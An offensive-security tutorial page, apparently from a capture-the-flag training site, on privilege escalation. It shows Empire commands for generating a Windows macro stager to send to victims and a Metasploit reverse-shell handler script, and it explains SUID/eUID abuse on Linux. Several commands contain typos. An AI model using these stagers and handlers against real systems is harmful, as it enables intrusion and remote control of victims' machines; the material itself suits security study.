Privilege Escalation Part I

Created On 27. Oct 2020

Updated: 2021-05-02 00:04:19.197877000 +0000

Created By: acidghost

By escalating the privileges inside a system the attackers gain access to resources which allows them to misuse them in any way. If an intruder gains access of a user's device, they might achieve higher level than the owners themselves. In an organization it is usually the system administrator who has the highest privileges and that's were the final enemies' goal lies. By exploiting known vulnerabilities, anyone could gain system admin rights in a respective environment.

The method how the privileges get escalated depends on the existing information on the target and the final goal. Very often attackers start with social engineering attacks such as phishing emails to get access to the target machine. From the target machine the intruders can make their way further inside an organization. Even if a phishing email does not sound malicious in our days, there are enough people who will open the email, maybe at home where they have an outdated client, and just this is enough for executing an attack.
Goals can be different as well (stealing information, corrupting the serves etc).
After performing reconnaissance on their targets, evil hackers will try to get access by researching the known vulnerabilities and crafting exploits with specific tools.

There are many articles covering this topic, for reference here are some:
https://medium.com/bugbountywriteup/privilege-escalation-in-windows-380bee3a2842
https://attack.mitre.org/tactics/TA0004/
We will still get to the more sophisticated and specific examples that evolve around different systems. However, if you seriously want to achieve a high skill in misusing systems, please study some Assembly and C.

Empire

Empire is great post exploitation framework for windows enviroments http://www.powershellempire.com. It allows to inject payloads in Macros, BAT and other file types. Later versions of Empire work also against Linux and Mac OS. Usually an attacker would set up a listener such as meterpreter shell and link it to a stager that contains the malicious payload and is sent to the victim.
Empire sets up stagers automatically. After running empire run:
(Empire) > listeners
(Empire: listeners) > usestager windows/macro
(Empire: stager/windows/macro) > set Listener CL
(Empire: stager/windows/macro) > execute
Stager output written out to: /tmp/macro

This will set up a macro stager that can be further be sent to the victim. You can examine the stager that is saved in /tmp/macro
Further move on escalating privileges depends on the target system. On Windows machines, some might just need to bypass Microsoft UAC if the victims are logged in as admins http://www.powershellempire.com/?page_id=380.
Other techniques will be discussed in other parts.

Reverse Shell
There is are even jokes in hacker community about IOT device security, since it's rare when they are properly patched. Take care not to fall of your chair when you see Ubuntu 10 or so. Most of IOT devices run on Linux systems. A meterpreter shell is often used to establish a reverse shell. This can be done with metasploit.

$ msf
multi.rc
resource (multi.rc)> use eploit/multi/handler
resource (multi.rc)> set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
resource (multi.rc)> set (your host goes here)
LHOST => (your host)
resource (multi.rc)> set lport (your port goes here)
lport => (your port)
resource (multi.rc)> exploit

Through an exploit such as mentioned before in Empire, a connection to the handler can be established invoking a persistent shell.
Now you can check for vulnerabilities and establish a reverse shell through metasploit to a Ubuntu 10. Metasploit has a script iot.rc that can be invoked with Meterpreter. More on exploiting IOT devices will come up later, however looking up for system version + privilege escalation keywords is always a good start.

Application Missuse in Linux

Linux has a permissiom model with read, write and execute for SUID, SGID and Sticky. SUID and SGID will execute with eUID and eGID of file owner instead of the parent process, and sticky is for shared directories.
The eUID and eGID are also known as effective UID/GID of users, that fall for most checks and the UID/GID are the real ones which are used for signal checks. Saved is a UID/GID that can temporarily switch the eUID/eGID of the process.
eUID will not bring you to the real root, and many calls are secured against eUID abuse. With a vulnerability in SUID the attacker can escalate the privileges and gain a eUID of 0 as well, what is enough to mess up badly a system.
You can check more on this here
Go explore the challenges and see if you can find them all

Section: Web